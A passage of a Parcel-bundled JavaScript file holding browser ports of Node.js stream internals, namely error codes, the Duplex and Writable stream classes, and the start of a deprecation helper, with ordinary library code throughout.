    var determiner;
    if (typeof expected === "string" && $4e720097bc0bc9d8$var$startsWith(expected, "not ")) {
        determiner = "must not be";
        expected = expected.replace(/^not /, "");
    } else determiner = "must be";
    var msg;
    if ($4e720097bc0bc9d8$var$endsWith(name, " argument")) // For cases like 'first argument'
    msg = "The ".concat(name, " ").concat(determiner, " ").concat($4e720097bc0bc9d8$var$oneOf(expected, "type"));
    else {
        var type = $4e720097bc0bc9d8$var$includes(name, ".") ? "property" : "argument";
        msg = 'The "'.concat(name, '" ').concat(type, " ").concat(determiner, " ").concat($4e720097bc0bc9d8$var$oneOf(expected, "type"));
    }
    msg += ". Received type ".concat(typeof actual);
    return msg;
}, TypeError);
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_PUSH_AFTER_EOF", "stream.push() after EOF");
$4e720097bc0bc9d8$var$createErrorType("ERR_METHOD_NOT_IMPLEMENTED", function(name) {
    return "The " + name + " method is not implemented";
});
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_PREMATURE_CLOSE", "Premature close");
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_DESTROYED", function(name) {
    return "Cannot call " + name + " after a stream was destroyed";
});
$4e720097bc0bc9d8$var$createErrorType("ERR_MULTIPLE_CALLBACK", "Callback called multiple times");
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_CANNOT_PIPE", "Cannot pipe, not readable");
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_WRITE_AFTER_END", "write after end");
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_NULL_VALUES", "May not write null values to stream", TypeError);
$4e720097bc0bc9d8$var$createErrorType("ERR_UNKNOWN_ENCODING", function(arg) {
    return "Unknown encoding: " + arg;
}, TypeError);
$4e720097bc0bc9d8$var$createErrorType("ERR_STREAM_UNSHIFT_AFTER_END_EVENT", "stream.unshift() after end event");
$4e720097bc0bc9d8$export$e45cb6485273080e = $4e720097bc0bc9d8$var$codes;

});


parcelRequire.register("DwJuQ", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// a duplex stream is just a stream that is both readable and writable.
// Since JS doesn't have multiple prototypal inheritance, this class
// prototypally inherits from Readable, and then parasitically from
// Writable.

var $hPtJY = parcelRequire("hPtJY");
"use strict";
/*<replacement>*/ var $076d08b0309449dc$var$objectKeys = Object.keys || function(obj) {
    var keys = [];
    for(var key in obj)keys.push(key);
    return keys;
};
/*</replacement>*/ module.exports = $076d08b0309449dc$var$Duplex;

var $d4xg3 = parcelRequire("d4xg3");

var $3LwY7 = parcelRequire("3LwY7");

(parcelRequire("dlqwk"))($076d08b0309449dc$var$Duplex, $d4xg3);
// Allow the keys array to be GC'ed.
var $076d08b0309449dc$var$keys = $076d08b0309449dc$var$objectKeys($3LwY7.prototype);
for(var $076d08b0309449dc$var$v = 0; $076d08b0309449dc$var$v < $076d08b0309449dc$var$keys.length; $076d08b0309449dc$var$v++){
    var $076d08b0309449dc$var$method = $076d08b0309449dc$var$keys[$076d08b0309449dc$var$v];
    if (!$076d08b0309449dc$var$Duplex.prototype[$076d08b0309449dc$var$method]) $076d08b0309449dc$var$Duplex.prototype[$076d08b0309449dc$var$method] = $3LwY7.prototype[$076d08b0309449dc$var$method];
}
function $076d08b0309449dc$var$Duplex(options) {
    if (!(this instanceof $076d08b0309449dc$var$Duplex)) return new $076d08b0309449dc$var$Duplex(options);
    $d4xg3.call(this, options);
    $3LwY7.call(this, options);
    this.allowHalfOpen = true;
    if (options) {
        if (options.readable === false) this.readable = false;
        if (options.writable === false) this.writable = false;
        if (options.allowHalfOpen === false) {
            this.allowHalfOpen = false;
            this.once("end", $076d08b0309449dc$var$onend);
        }
    }
}
Object.defineProperty($076d08b0309449dc$var$Duplex.prototype, "writableHighWaterMark", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._writableState.highWaterMark;
    }
});
Object.defineProperty($076d08b0309449dc$var$Duplex.prototype, "writableBuffer", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._writableState && this._writableState.getBuffer();
    }
});
Object.defineProperty($076d08b0309449dc$var$Duplex.prototype, "writableLength", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._writableState.length;
    }
});
// the no-half-open enforcer
function $076d08b0309449dc$var$onend() {
    // If the writable side ended, then we're ok.
    if (this._writableState.ended) return;
    // no more data can be written.
    // But allow more writes to happen in this tick.
    $hPtJY.nextTick($076d08b0309449dc$var$onEndNT, this);
}
function $076d08b0309449dc$var$onEndNT(self) {
    self.end();
}
Object.defineProperty($076d08b0309449dc$var$Duplex.prototype, "destroyed", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        if (this._readableState === undefined || this._writableState === undefined) return false;
        return this._readableState.destroyed && this._writableState.destroyed;
    },
    set: function set(value) {
        // we ignore the value if the stream
        // has not been initialized yet
        if (this._readableState === undefined || this._writableState === undefined) return;
        // backward compatibility, the user is explicitly
        // managing destroyed
        this._readableState.destroyed = value;
        this._writableState.destroyed = value;
    }
});

});
parcelRequire.register("3LwY7", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// A bit simpler than readable streams.
// Implement an async ._write(chunk, encoding, cb), and it'll handle all
// the drain event emission and buffering.

var $hPtJY = parcelRequire("hPtJY");
"use strict";
module.exports = $2bdf55c2c4f390d3$var$Writable;
/* <replacement> */ function $2bdf55c2c4f390d3$var$WriteReq(chunk, encoding, cb) {
    this.chunk = chunk;
    this.encoding = encoding;
    this.callback = cb;
    this.next = null;
}
// It seems a linked list but it is not
// there will be only 2 of these for each stream
function $2bdf55c2c4f390d3$var$CorkedRequest(state) {
    var _this = this;
    this.next = null;
    this.entry = null;
    this.finish = function() {
        $2bdf55c2c4f390d3$var$onCorkedFinish(_this, state);
    };
}
/* </replacement> */ /*<replacement>*/ var $2bdf55c2c4f390d3$var$Duplex;
/*</replacement>*/ $2bdf55c2c4f390d3$var$Writable.WritableState = $2bdf55c2c4f390d3$var$WritableState;

/*<replacement>*/ var $2bdf55c2c4f390d3$var$internalUtil = {
    deprecate: (parcelRequire("39vsn"))
};

var $jfAlf = parcelRequire("jfAlf");

var $6ZWSX = parcelRequire("6ZWSX");
var $2bdf55c2c4f390d3$require$Buffer = $6ZWSX.Buffer;
var $2bdf55c2c4f390d3$var$OurUint8Array = (typeof $parcel$global !== "undefined" ? $parcel$global : typeof window !== "undefined" ? window : typeof self !== "undefined" ? self : {}).Uint8Array || function() {};
function $2bdf55c2c4f390d3$var$_uint8ArrayToBuffer(chunk) {
    return $2bdf55c2c4f390d3$require$Buffer.from(chunk);
}
function $2bdf55c2c4f390d3$var$_isUint8Array(obj) {
    return $2bdf55c2c4f390d3$require$Buffer.isBuffer(obj) || obj instanceof $2bdf55c2c4f390d3$var$OurUint8Array;
}

var $fMCbt = parcelRequire("fMCbt");

var $04a3B = parcelRequire("04a3B");
var $2bdf55c2c4f390d3$var$getHighWaterMark = $04a3B.getHighWaterMark;

var $6JySE = parcelRequire("6JySE");
var $2bdf55c2c4f390d3$require$_require$codes = $6JySE.codes;
var $2bdf55c2c4f390d3$var$ERR_INVALID_ARG_TYPE = $2bdf55c2c4f390d3$require$_require$codes.ERR_INVALID_ARG_TYPE, $2bdf55c2c4f390d3$var$ERR_METHOD_NOT_IMPLEMENTED = $2bdf55c2c4f390d3$require$_require$codes.ERR_METHOD_NOT_IMPLEMENTED, $2bdf55c2c4f390d3$var$ERR_MULTIPLE_CALLBACK = $2bdf55c2c4f390d3$require$_require$codes.ERR_MULTIPLE_CALLBACK, $2bdf55c2c4f390d3$var$ERR_STREAM_CANNOT_PIPE = $2bdf55c2c4f390d3$require$_require$codes.ERR_STREAM_CANNOT_PIPE, $2bdf55c2c4f390d3$var$ERR_STREAM_DESTROYED = $2bdf55c2c4f390d3$require$_require$codes.ERR_STREAM_DESTROYED, $2bdf55c2c4f390d3$var$ERR_STREAM_NULL_VALUES = $2bdf55c2c4f390d3$require$_require$codes.ERR_STREAM_NULL_VALUES, $2bdf55c2c4f390d3$var$ERR_STREAM_WRITE_AFTER_END = $2bdf55c2c4f390d3$require$_require$codes.ERR_STREAM_WRITE_AFTER_END, $2bdf55c2c4f390d3$var$ERR_UNKNOWN_ENCODING = $2bdf55c2c4f390d3$require$_require$codes.ERR_UNKNOWN_ENCODING;
var $2bdf55c2c4f390d3$var$errorOrDestroy = $fMCbt.errorOrDestroy;

(parcelRequire("dlqwk"))($2bdf55c2c4f390d3$var$Writable, $jfAlf);
function $2bdf55c2c4f390d3$var$nop() {}

function $2bdf55c2c4f390d3$var$WritableState(options, stream, isDuplex) {
    $2bdf55c2c4f390d3$var$Duplex = $2bdf55c2c4f390d3$var$Duplex || (parcelRequire("DwJuQ"));
    options = options || {};
    // Duplex streams are both readable and writable, but share
    // the same options object.
    // However, some cases require setting options to different
    // values for the readable and the writable sides of the duplex stream,
    // e.g. options.readableObjectMode vs. options.writableObjectMode, etc.
    if (typeof isDuplex !== "boolean") isDuplex = stream instanceof $2bdf55c2c4f390d3$var$Duplex;
    // object stream flag to indicate whether or not this stream
    // contains buffers or objects.
    this.objectMode = !!options.objectMode;
    if (isDuplex) this.objectMode = this.objectMode || !!options.writableObjectMode;
    // the point at which write() starts returning false
    // Note: 0 is a valid value, means that we always return false if
    // the entire buffer is not flushed immediately on write()
    this.highWaterMark = $2bdf55c2c4f390d3$var$getHighWaterMark(this, options, "writableHighWaterMark", isDuplex);
    // if _final has been called
    this.finalCalled = false;
    // drain event flag.
    this.needDrain = false;
    // at the start of calling end()
    this.ending = false;
    // when end() has been called, and returned
    this.ended = false;
    // when 'finish' is emitted
    this.finished = false;
    // has it been destroyed
    this.destroyed = false;
    // should we decode strings into buffers before passing to _write?
    // this is here so that some node-core streams can optimize string
    // handling at a lower level.
    var noDecode = options.decodeStrings === false;
    this.decodeStrings = !noDecode;
    // Crypto is kind of old and crusty.  Historically, its default string
    // encoding is 'binary' so we have to make this configurable.
    // Everything else in the universe uses 'utf8', though.
    this.defaultEncoding = options.defaultEncoding || "utf8";
    // not an actual buffer we keep track of, but a measurement
    // of how much we're waiting to get pushed to some underlying
    // socket or file.
    this.length = 0;
    // a flag to see when we're in the middle of a write.
    this.writing = false;
    // when true all writes will be buffered until .uncork() call
    this.corked = 0;
    // a flag to be able to tell if the onwrite cb is called immediately,
    // or on a later tick.  We set this to true at first, because any
    // actions that shouldn't happen until "later" should generally also
    // not happen before the first write call.
    this.sync = true;
    // a flag to know if we're processing previously buffered items, which
    // may call the _write() callback in the same tick, so that we don't
    // end up in an overlapped onwrite situation.
    this.bufferProcessing = false;
    // the callback that's passed to _write(chunk,cb)
    this.onwrite = function(er) {
        $2bdf55c2c4f390d3$var$onwrite(stream, er);
    };
    // the callback that the user supplies to write(chunk,encoding,cb)
    this.writecb = null;
    // the amount that is being written when _write is called.
    this.writelen = 0;
    this.bufferedRequest = null;
    this.lastBufferedRequest = null;
    // number of pending user-supplied write callbacks
    // this must be 0 before 'finish' can be emitted
    this.pendingcb = 0;
    // emit prefinish if the only thing we're waiting for is _write cbs
    // This is relevant for synchronous Transform streams
    this.prefinished = false;
    // True if the error was already emitted and should not be thrown again
    this.errorEmitted = false;
    // Should close be emitted on destroy. Defaults to true.
    this.emitClose = options.emitClose !== false;
    // Should .destroy() be called after 'finish' (and potentially 'end')
    this.autoDestroy = !!options.autoDestroy;
    // count buffered requests
    this.bufferedRequestCount = 0;
    // allocate the first CorkedRequest, there is always
    // one allocated and free to use, and we maintain at most two
    this.corkedRequestsFree = new $2bdf55c2c4f390d3$var$CorkedRequest(this);
}
$2bdf55c2c4f390d3$var$WritableState.prototype.getBuffer = function getBuffer() {
    var current = this.bufferedRequest;
    var out = [];
    while(current){
        out.push(current);
        current = current.next;
    }
    return out;
};
(function() {
    try {
        Object.defineProperty($2bdf55c2c4f390d3$var$WritableState.prototype, "buffer", {
            get: $2bdf55c2c4f390d3$var$internalUtil.deprecate(function writableStateBufferGetter() {
                return this.getBuffer();
            }, "_writableState.buffer is deprecated. Use _writableState.getBuffer instead.", "DEP0003")
        });
    } catch (_) {}
})();
// Test _writableState for inheritance to account for Duplex streams,
// whose prototype chain only points to Readable.
var $2bdf55c2c4f390d3$var$realHasInstance;
if (typeof Symbol === "function" && Symbol.hasInstance && typeof Function.prototype[Symbol.hasInstance] === "function") {
    $2bdf55c2c4f390d3$var$realHasInstance = Function.prototype[Symbol.hasInstance];
    Object.defineProperty($2bdf55c2c4f390d3$var$Writable, Symbol.hasInstance, {
        value: function value(object) {
            if ($2bdf55c2c4f390d3$var$realHasInstance.call(this, object)) return true;
            if (this !== $2bdf55c2c4f390d3$var$Writable) return false;
            return object && object._writableState instanceof $2bdf55c2c4f390d3$var$WritableState;
        }
    });
} else $2bdf55c2c4f390d3$var$realHasInstance = function realHasInstance(object) {
    return object instanceof this;
};

function $2bdf55c2c4f390d3$var$Writable(options) {
    $2bdf55c2c4f390d3$var$Duplex = $2bdf55c2c4f390d3$var$Duplex || (parcelRequire("DwJuQ"));
    // Writable ctor is applied to Duplexes, too.
    // `realHasInstance` is necessary because using plain `instanceof`
    // would return false, as no `_writableState` property is attached.
    // Trying to use the custom `instanceof` for Writable here will also break the
    // Node.js LazyTransform implementation, which has a non-trivial getter for
    // `_writableState` that would lead to infinite recursion.
    // Checking for a Stream.Duplex instance is faster here instead of inside
    // the WritableState constructor, at least with V8 6.5
    var isDuplex = this instanceof $2bdf55c2c4f390d3$var$Duplex;
    if (!isDuplex && !$2bdf55c2c4f390d3$var$realHasInstance.call($2bdf55c2c4f390d3$var$Writable, this)) return new $2bdf55c2c4f390d3$var$Writable(options);
    this._writableState = new $2bdf55c2c4f390d3$var$WritableState(options, this, isDuplex);
    // legacy.
    this.writable = true;
    if (options) {
        if (typeof options.write === "function") this._write = options.write;
        if (typeof options.writev === "function") this._writev = options.writev;
        if (typeof options.destroy === "function") this._destroy = options.destroy;
        if (typeof options.final === "function") this._final = options.final;
    }
    $jfAlf.call(this);
}
// Otherwise people can pipe Writable streams, which is just wrong.
$2bdf55c2c4f390d3$var$Writable.prototype.pipe = function() {
    $2bdf55c2c4f390d3$var$errorOrDestroy(this, new $2bdf55c2c4f390d3$var$ERR_STREAM_CANNOT_PIPE());
};
function $2bdf55c2c4f390d3$var$writeAfterEnd(stream, cb) {
    var er = new $2bdf55c2c4f390d3$var$ERR_STREAM_WRITE_AFTER_END();
    // TODO: defer error events consistently everywhere, not just the cb
    $2bdf55c2c4f390d3$var$errorOrDestroy(stream, er);
    $hPtJY.nextTick(cb, er);
}
// Checks that a user-supplied chunk is valid, especially for the particular
// mode the stream is in. Currently this means that `null` is never accepted
// and undefined/non-string values are only allowed in object mode.
function $2bdf55c2c4f390d3$var$validChunk(stream, state, chunk, cb) {
    var er;
    if (chunk === null) er = new $2bdf55c2c4f390d3$var$ERR_STREAM_NULL_VALUES();
    else if (typeof chunk !== "string" && !state.objectMode) er = new $2bdf55c2c4f390d3$var$ERR_INVALID_ARG_TYPE("chunk", [
        "string",
        "Buffer"
    ], chunk);
    if (er) {
        $2bdf55c2c4f390d3$var$errorOrDestroy(stream, er);
        $hPtJY.nextTick(cb, er);
        return false;
    }
    return true;
}
$2bdf55c2c4f390d3$var$Writable.prototype.write = function(chunk, encoding, cb) {
    var state = this._writableState;
    var ret = false;
    var isBuf = !state.objectMode && $2bdf55c2c4f390d3$var$_isUint8Array(chunk);
    if (isBuf && !$2bdf55c2c4f390d3$require$Buffer.isBuffer(chunk)) chunk = $2bdf55c2c4f390d3$var$_uint8ArrayToBuffer(chunk);
    if (typeof encoding === "function") {
        cb = encoding;
        encoding = null;
    }
    if (isBuf) encoding = "buffer";
    else if (!encoding) encoding = state.defaultEncoding;
    if (typeof cb !== "function") cb = $2bdf55c2c4f390d3$var$nop;
    if (state.ending) $2bdf55c2c4f390d3$var$writeAfterEnd(this, cb);
    else if (isBuf || $2bdf55c2c4f390d3$var$validChunk(this, state, chunk, cb)) {
        state.pendingcb++;
        ret = $2bdf55c2c4f390d3$var$writeOrBuffer(this, state, isBuf, chunk, encoding, cb);
    }
    return ret;
};
$2bdf55c2c4f390d3$var$Writable.prototype.cork = function() {
    this._writableState.corked++;
};
$2bdf55c2c4f390d3$var$Writable.prototype.uncork = function() {
    var state = this._writableState;
    if (state.corked) {
        state.corked--;
        if (!state.writing && !state.corked && !state.bufferProcessing && state.bufferedRequest) $2bdf55c2c4f390d3$var$clearBuffer(this, state);
    }
};
$2bdf55c2c4f390d3$var$Writable.prototype.setDefaultEncoding = function setDefaultEncoding(encoding) {
    // node::ParseEncoding() requires lower case.
    if (typeof encoding === "string") encoding = encoding.toLowerCase();
    if (!([
        "hex",
        "utf8",
        "utf-8",
        "ascii",
        "binary",
        "base64",
        "ucs2",
        "ucs-2",
        "utf16le",
        "utf-16le",
        "raw"
    ].indexOf((encoding + "").toLowerCase()) > -1)) throw new $2bdf55c2c4f390d3$var$ERR_UNKNOWN_ENCODING(encoding);
    this._writableState.defaultEncoding = encoding;
    return this;
};
Object.defineProperty($2bdf55c2c4f390d3$var$Writable.prototype, "writableBuffer", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._writableState && this._writableState.getBuffer();
    }
});
function $2bdf55c2c4f390d3$var$decodeChunk(state, chunk, encoding) {
    if (!state.objectMode && state.decodeStrings !== false && typeof chunk === "string") chunk = $2bdf55c2c4f390d3$require$Buffer.from(chunk, encoding);
    return chunk;
}
Object.defineProperty($2bdf55c2c4f390d3$var$Writable.prototype, "writableHighWaterMark", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._writableState.highWaterMark;
    }
});
// if we're already writing something, then just put this
// in the queue, and wait our turn.  Otherwise, call _write
// If we return false, then we need a drain event, so set that flag.
function $2bdf55c2c4f390d3$var$writeOrBuffer(stream, state, isBuf, chunk, encoding, cb) {
    if (!isBuf) {
        var newChunk = $2bdf55c2c4f390d3$var$decodeChunk(state, chunk, encoding);
        if (chunk !== newChunk) {
            isBuf = true;
            encoding = "buffer";
            chunk = newChunk;
        }
    }
    var len = state.objectMode ? 1 : chunk.length;
    state.length += len;
    var ret = state.length < state.highWaterMark;
    // we must ensure that previous needDrain will not be reset to false.
    if (!ret) state.needDrain = true;
    if (state.writing || state.corked) {
        var last = state.lastBufferedRequest;
        state.lastBufferedRequest = {
            chunk: chunk,
            encoding: encoding,
            isBuf: isBuf,
            callback: cb,
            next: null
        };
        if (last) last.next = state.lastBufferedRequest;
        else state.bufferedRequest = state.lastBufferedRequest;
        state.bufferedRequestCount += 1;
    } else $2bdf55c2c4f390d3$var$doWrite(stream, state, false, len, chunk, encoding, cb);
    return ret;
}
function $2bdf55c2c4f390d3$var$doWrite(stream, state, writev, len, chunk, encoding, cb) {
    state.writelen = len;
    state.writecb = cb;
    state.writing = true;
    state.sync = true;
    if (state.destroyed) state.onwrite(new $2bdf55c2c4f390d3$var$ERR_STREAM_DESTROYED("write"));
    else if (writev) stream._writev(chunk, state.onwrite);
    else stream._write(chunk, encoding, state.onwrite);
    state.sync = false;
}
function $2bdf55c2c4f390d3$var$onwriteError(stream, state, sync, er, cb) {
    --state.pendingcb;
    if (sync) {
        // defer the callback if we are being called synchronously
        // to avoid piling up things on the stack
        $hPtJY.nextTick(cb, er);
        // this can emit finish, and it will always happen
        // after error
        $hPtJY.nextTick($2bdf55c2c4f390d3$var$finishMaybe, stream, state);
        stream._writableState.errorEmitted = true;
        $2bdf55c2c4f390d3$var$errorOrDestroy(stream, er);
    } else {
        // the caller expect this to happen before if
        // it is async
        cb(er);
        stream._writableState.errorEmitted = true;
        $2bdf55c2c4f390d3$var$errorOrDestroy(stream, er);
        // this can emit finish, but finish must
        // always follow error
        $2bdf55c2c4f390d3$var$finishMaybe(stream, state);
    }
}
function $2bdf55c2c4f390d3$var$onwriteStateUpdate(state) {
    state.writing = false;
    state.writecb = null;
    state.length -= state.writelen;
    state.writelen = 0;
}
function $2bdf55c2c4f390d3$var$onwrite(stream, er) {
    var state = stream._writableState;
    var sync = state.sync;
    var cb = state.writecb;
    if (typeof cb !== "function") throw new $2bdf55c2c4f390d3$var$ERR_MULTIPLE_CALLBACK();
    $2bdf55c2c4f390d3$var$onwriteStateUpdate(state);
    if (er) $2bdf55c2c4f390d3$var$onwriteError(stream, state, sync, er, cb);
    else {
        // Check if we're actually ready to finish, but don't emit yet
        var finished = $2bdf55c2c4f390d3$var$needFinish(state) || stream.destroyed;
        if (!finished && !state.corked && !state.bufferProcessing && state.bufferedRequest) $2bdf55c2c4f390d3$var$clearBuffer(stream, state);
        if (sync) $hPtJY.nextTick($2bdf55c2c4f390d3$var$afterWrite, stream, state, finished, cb);
        else $2bdf55c2c4f390d3$var$afterWrite(stream, state, finished, cb);
    }
}
function $2bdf55c2c4f390d3$var$afterWrite(stream, state, finished, cb) {
    if (!finished) $2bdf55c2c4f390d3$var$onwriteDrain(stream, state);
    state.pendingcb--;
    cb();
    $2bdf55c2c4f390d3$var$finishMaybe(stream, state);
}
// Must force callback to be called on nextTick, so that we don't
// emit 'drain' before the write() consumer gets the 'false' return
// value, and has a chance to attach a 'drain' listener.
function $2bdf55c2c4f390d3$var$onwriteDrain(stream, state) {
    if (state.length === 0 && state.needDrain) {
        state.needDrain = false;
        stream.emit("drain");
    }
}
// if there's something in the buffer waiting, then process it
function $2bdf55c2c4f390d3$var$clearBuffer(stream, state) {
    state.bufferProcessing = true;
    var entry = state.bufferedRequest;
    if (stream._writev && entry && entry.next) {
        // Fast case, write everything using _writev()
        var l = state.bufferedRequestCount;
        var buffer = new Array(l);
        var holder = state.corkedRequestsFree;
        holder.entry = entry;
        var count = 0;
        var allBuffers = true;
        while(entry){
            buffer[count] = entry;
            if (!entry.isBuf) allBuffers = false;
            entry = entry.next;
            count += 1;
        }
        buffer.allBuffers = allBuffers;
        $2bdf55c2c4f390d3$var$doWrite(stream, state, true, state.length, buffer, "", holder.finish);
        // doWrite is almost always async, defer these to save a bit of time
        // as the hot path ends with doWrite
        state.pendingcb++;
        state.lastBufferedRequest = null;
        if (holder.next) {
            state.corkedRequestsFree = holder.next;
            holder.next = null;
        } else state.corkedRequestsFree = new $2bdf55c2c4f390d3$var$CorkedRequest(state);
        state.bufferedRequestCount = 0;
    } else {
        // Slow case, write chunks one-by-one
        while(entry){
            var chunk = entry.chunk;
            var encoding = entry.encoding;
            var cb = entry.callback;
            var len = state.objectMode ? 1 : chunk.length;
            $2bdf55c2c4f390d3$var$doWrite(stream, state, false, len, chunk, encoding, cb);
            entry = entry.next;
            state.bufferedRequestCount--;
            // if we didn't call the onwrite immediately, then
            // it means that we need to wait until it does.
            // also, that means that the chunk and cb are currently
            // being processed, so move the buffer counter past them.
            if (state.writing) break;
        }
        if (entry === null) state.lastBufferedRequest = null;
    }
    state.bufferedRequest = entry;
    state.bufferProcessing = false;
}
$2bdf55c2c4f390d3$var$Writable.prototype._write = function(chunk, encoding, cb) {
    cb(new $2bdf55c2c4f390d3$var$ERR_METHOD_NOT_IMPLEMENTED("_write()"));
};
$2bdf55c2c4f390d3$var$Writable.prototype._writev = null;
$2bdf55c2c4f390d3$var$Writable.prototype.end = function(chunk, encoding, cb) {
    var state = this._writableState;
    if (typeof chunk === "function") {
        cb = chunk;
        chunk = null;
        encoding = null;
    } else if (typeof encoding === "function") {
        cb = encoding;
        encoding = null;
    }
    if (chunk !== null && chunk !== undefined) this.write(chunk, encoding);
    // .end() fully uncorks
    if (state.corked) {
        state.corked = 1;
        this.uncork();
    }
    // ignore unnecessary end() calls.
    if (!state.ending) $2bdf55c2c4f390d3$var$endWritable(this, state, cb);
    return this;
};
Object.defineProperty($2bdf55c2c4f390d3$var$Writable.prototype, "writableLength", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._writableState.length;
    }
});
function $2bdf55c2c4f390d3$var$needFinish(state) {
    return state.ending && state.length === 0 && state.bufferedRequest === null && !state.finished && !state.writing;
}
function $2bdf55c2c4f390d3$var$callFinal(stream, state) {
    stream._final(function(err) {
        state.pendingcb--;
        if (err) $2bdf55c2c4f390d3$var$errorOrDestroy(stream, err);
        state.prefinished = true;
        stream.emit("prefinish");
        $2bdf55c2c4f390d3$var$finishMaybe(stream, state);
    });
}
function $2bdf55c2c4f390d3$var$prefinish(stream, state) {
    if (!state.prefinished && !state.finalCalled) {
        if (typeof stream._final === "function" && !state.destroyed) {
            state.pendingcb++;
            state.finalCalled = true;
            $hPtJY.nextTick($2bdf55c2c4f390d3$var$callFinal, stream, state);
        } else {
            state.prefinished = true;
            stream.emit("prefinish");
        }
    }
}
function $2bdf55c2c4f390d3$var$finishMaybe(stream, state) {
    var need = $2bdf55c2c4f390d3$var$needFinish(state);
    if (need) {
        $2bdf55c2c4f390d3$var$prefinish(stream, state);
        if (state.pendingcb === 0) {
            state.finished = true;
            stream.emit("finish");
            if (state.autoDestroy) {
                // In case of duplex streams we need a way to detect
                // if the readable side is ready for autoDestroy as well
                var rState = stream._readableState;
                if (!rState || rState.autoDestroy && rState.endEmitted) stream.destroy();
            }
        }
    }
    return need;
}
function $2bdf55c2c4f390d3$var$endWritable(stream, state, cb) {
    state.ending = true;
    $2bdf55c2c4f390d3$var$finishMaybe(stream, state);
    if (cb) {
        if (state.finished) $hPtJY.nextTick(cb);
        else stream.once("finish", cb);
    }
    state.ended = true;
    stream.writable = false;
}
function $2bdf55c2c4f390d3$var$onCorkedFinish(corkReq, state, err) {
    var entry = corkReq.entry;
    corkReq.entry = null;
    while(entry){
        var cb = entry.callback;
        state.pendingcb--;
        cb(err);
        entry = entry.next;
    }
    // reuse the free corkReq.
    state.corkedRequestsFree.next = corkReq;
}
Object.defineProperty($2bdf55c2c4f390d3$var$Writable.prototype, "destroyed", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        if (this._writableState === undefined) return false;
        return this._writableState.destroyed;
    },
    set: function set(value) {
        // we ignore the value if the stream
        // has not been initialized yet
        if (!this._writableState) return;
        // backward compatibility, the user is explicitly
        // managing destroyed
        this._writableState.destroyed = value;
    }
});
$2bdf55c2c4f390d3$var$Writable.prototype.destroy = $fMCbt.destroy;
$2bdf55c2c4f390d3$var$Writable.prototype._undestroy = $fMCbt.undestroy;
$2bdf55c2c4f390d3$var$Writable.prototype._destroy = function(err, cb) {
    cb(err);
};

});
parcelRequire.register("39vsn", function(module, exports) {
/**
 * Module exports.
 */ module.exports = $24ba9cfc39d77116$var$deprecate;
/**
 * Mark that a method should not be used.
 * Returns a modified function which warns once by default.
 *
 * If `localStorage.noDeprecation = true` is set, then it is a no-op.
 *
 * If `localStorage.throwDeprecation = true` is set, then deprecated functions
 * will throw an Error when invoked.
 *
 * If `localStorage.traceDeprecation = true` is set, then deprecated functions
 * will invoke `console.trace()` instead of `console.error()`.
 *
 * @param {Function} fn - the function to deprecate
 * @param {String} msg - the string to print to the console when `fn` is invoked
 * @returns {Function} a new "deprecated" version of `fn`
 * @api public
 */ function $24ba9cfc39d77116$var$deprecate(fn, msg) {
    if ($24ba9cfc39d77116$var$config("noDeprecation")) return fn;
    var warned = false;
    function deprecated() {
        if (!warned) {
            if ($24ba9cfc39d77116$var$config("throwDeprecation")) throw new Error(msg);
            else if ($24ba9cfc39d77116$var$config("traceDeprecation")) console.trace(msg);
